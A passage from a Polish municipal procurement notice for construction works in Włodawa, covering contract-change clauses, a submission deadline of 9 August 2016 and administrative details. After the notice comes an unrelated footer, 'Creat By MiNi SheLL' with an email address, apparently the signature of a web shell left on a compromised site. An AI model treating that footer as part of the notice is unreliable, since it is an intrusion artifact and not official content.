powietrznej, pożaru, powodzi, itp.c) konieczności wykonania zamiennej dokumentacji projektowej, d) konieczności przeprowadzenia nieprzewidzianych uzgodnień prawnych lub technicznych,  e) wstrzymania budowy przez właściwy organ z przyczyn niezależnych od Wykonawcy robót budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu itp.,  f) wystąpienie osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad normy oraz innych nie dających się przewidzieć zjawisk geologicznych i hydrogeologicznych pojawiających się w trakcie budowy,
g) wystąpienia przedłużenia się okresu osiągania parametrów technologicznych niezależnego od Wykonawcy, h) zamawiający dopuszcza zmianę numeru konta, na które zostaną przelane środki z tytułu wynagrodzenia za roboty objęte niniejszą umową.  Inicjatorem zmiany może być wykonawca. Zmiana ta nie wpłynie na wynagrodzenie wykonawcy i nie spowoduje zmiany wynagrodzenia.Inicjatorem zmian określonych w pkt  4) p.pkt d) może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie spowoduje zmiany wynagrodzenia Wykonawcy i może spowodować zmianę terminu wykonania robót.14.5. Zamawiający dopuszcza zmianę jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmianę technologii ze względu na zmianę postępu technologicznego (np. wycofanie produktu z rynku) w uzgodnieniu z Zamawiającym i dla niego korzystnych, w sytuacjach nie zawinionych przez Wykonawcę. Zmiany te nie wpłyną na termin wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.
14.6. Zamawiający dopuszcza zmianę podwykonawcy. Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Inicjatorem zmiany może być wykonawca. W przypadku podwykonawców, na których potencjał powoływał się wykonawca w celu spełniania warunków udziału w postępowaniu wykonawca jest zobowiązany wskazać innego podwykonawcę, który posiada wymagany w SIWZ potencjał w stopniu nie mniejszym niż podwykonawca ujawniony w ofercie. 
14.7. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą organizacyjną umowy np.zmiana danych teleadresowych. Wykonawca jest jednak zobowiązany niezwłocznie poinformować o takowych zmianach Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wlodawa.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski we Włodawie, Al. J. Piłsudskiego 41, 22-200 Włodawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2016 godzina 10:00, miejsce: Urząd Miejski we Włodawie, Al. J. Piłsudskiego 41, 22-200 Włodawa - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com